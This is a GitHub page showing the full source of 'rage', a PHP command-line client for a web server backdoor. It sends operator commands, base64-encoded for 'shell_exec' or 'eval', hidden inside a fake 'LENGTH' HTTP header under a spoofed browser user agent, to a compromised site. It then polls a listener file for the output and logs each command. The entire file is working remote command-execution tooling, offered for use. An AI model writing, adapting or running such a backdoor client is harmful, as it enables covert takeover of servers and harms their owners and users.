-
Notifications
You must be signed in to change notification settings - Fork 17
/
rage
executable file
·142 lines (115 loc) · 4.31 KB
/
rage
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
#!/usr/bin/php
<?php
$command_history_Array = array();
define("PWNEDURL", "http://127.0.0.1/php/");
define("LISTENER_FILE", "/var/www/php/response.txt");
define("LISTENER_URL", "http://127.0.0.1/php/listener.php");
echo "
`7MM\"\"\"Mq. db .g8\"\"\"bgd `7MM\"\"\"YMM
MM `MM. ;MM: .dP' `M MM `7
MM ,M9 ,V^MM. dM' ` MM d
MMmmdM9 ,M `MM MM MMmmMM
MM YM. AbmmmqMA MM. `7MMF' MM Y ,
MM `Mb. A' VML `Mb. MM MM ,M
.JMML. .JMM..AMA. .AMMA. `\"bmmmdPY .JMMmmmmMMM
To execute PHP commands: phpexec echo 'test';
";
$done = false;
while(!$done) {
echo "rage@backdoor> ";
$handle = fopen("php://stdin","r");
$command = fgets($handle);
$command = trim($command);
if($command == "exit") {
$done = true;
} else {
if($command == "!!") {
$command = end($command_history_Array);
}
if($command != ''){
if( contains( $command, "phpexec" ) ) {
$command = str_replace( "phpexec ", "", $command );
echo send( $command );
} else {
echo send( $command );
}
}
}
}
function send($command, $isphp = False) {
$charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ=";
if($isphp) {
$headersArray = array("LENGTH: ".get_random_string($charset, 2).base64_encode("eval"."\x15".$command." 2>&1"."\x15".LISTENER_URL."/?r="), 'Expect:' );
} else {
$headersArray = array("LENGTH: ".get_random_string($charset, 2).base64_encode("shell_exec"."\x15".$command." 2>&1"."\x15".LISTENER_URL."/?r="), 'Expect:' );
}
$curl = curl_init();
curl_setopt_array($curl, array(
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_URL => PWNEDURL,
CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36',
CURLOPT_HTTPHEADER => $headersArray,
CURLOPT_HEADER => true
));
$resp = curl_exec($curl);
$headers = get_headers_from_curl_response($resp);
curl_close($curl);
echo "Waiting for response from server...\n";
$response = "NULLCONTENT";
while( $response == "NULLCONTENT" ) {
$response = file_get_contents( LISTENER_FILE );
sleep(1);
}
file_put_contents( LISTENER_FILE, "NULLCONTENT" );
log_command($command, $response);
return $response;
}
function log_command($command, $response) {
global $command_history_Array;
array_push($command_history_Array, $command);
file_put_contents("logs.txt", "rage@backdoor> ".$command.$response, FILE_APPEND);
}
function get_random_string($valid_chars, $length)
{
// start with an empty random string
$random_string = "";
// count the number of chars in the valid chars string so we know how many choices we have
$num_valid_chars = strlen($valid_chars);
// repeat the steps until we've created a string of the right length
for ($i = 0; $i < $length; $i++)
{
// pick a random number from 1 up to the number of valid chars
$random_pick = mt_rand(1, $num_valid_chars);
// take the random character out of the string of valid chars
// subtract 1 from $random_pick because strings are indexed starting at 0, and we started picking at 1
$random_char = $valid_chars[$random_pick-1];
// add the randomly-chosen char onto the end of our string so far
$random_string .= $random_char;
}
// return our finished random string
return $random_string;
}
function get_headers_from_curl_response($response)
{
$headers = array();
$header_text = substr($response, 0, strpos($response, "\r\n\r\n"));
foreach (explode("\r\n", $header_text) as $i => $line)
if ($i === 0)
$headers['http_code'] = $line;
else
{
list ($key, $value) = explode(': ', $line);
$headers[$key] = $value;
}
return $headers;
}
function contains($haystack, $needle)
{
if(strpos($haystack, $needle) !== false)
{
return TRUE;
} else {
return FALSE;
}
}
?>